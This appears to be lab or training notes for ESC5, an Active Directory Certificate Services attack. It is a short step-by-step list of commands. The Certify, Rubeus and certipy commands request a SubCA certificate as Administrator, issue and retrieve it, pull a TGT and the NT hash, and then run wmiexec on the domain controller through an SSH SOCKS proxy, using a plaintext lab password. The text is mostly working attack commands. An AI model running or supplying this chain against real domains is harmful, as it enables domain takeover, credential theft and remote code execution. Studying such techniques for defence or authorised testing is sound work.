ESC5

Vulnerable PKI Object Access Control

Windows

Request a certificate using the SubCA template

.\Certify.exe request /ca:WS01.minions.com\lab-WS01-CA /template:SubCA /altname:Administrator

Download Pending Request

.\Certify.exe download /ca:WS01.lab.local\lab-WS01-CA /id:10

Convert PEM to PFX

openssl pkcs12 -in approved.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out approved.pfx

Request the TGT and the NT Hash

.\Rubeus.exe asktgt /user:administrator /certificate:approved.pfx /getcredentials

Linux

SSH Port Forwarding

ssh -N -f -D 127.0.0.1:9050 htb-student@<ip>

Request a certificate as the Domain Administrator

certipy req -u cken -p Superman001 -dc-ip <ip> -ca lab-WS01-CA -template SubCA -upn Administrator

Issue the requested certificate

certipy ca -u cken -p Superman001 -dc-ip <ip> -ca lab-WS01-CA -issue-request 10

Retrieve the issued certificate

certipy req -u cken -p Superman001 -dc-ip <ip> -ca lab-WS01-CA -retrieve 10

Authenticate with the Administrator Certificate

certipy auth -pfx administrator.pfx -username administrator -domain lab.local -dc-ip <ip>

Execute wmiexec with proxychains using a TGT

KRB5CCNAME=administrator.ccache wmiexec.py -k -no-pass LAB-DC.LAB.LOCAL -dc-ip <ip>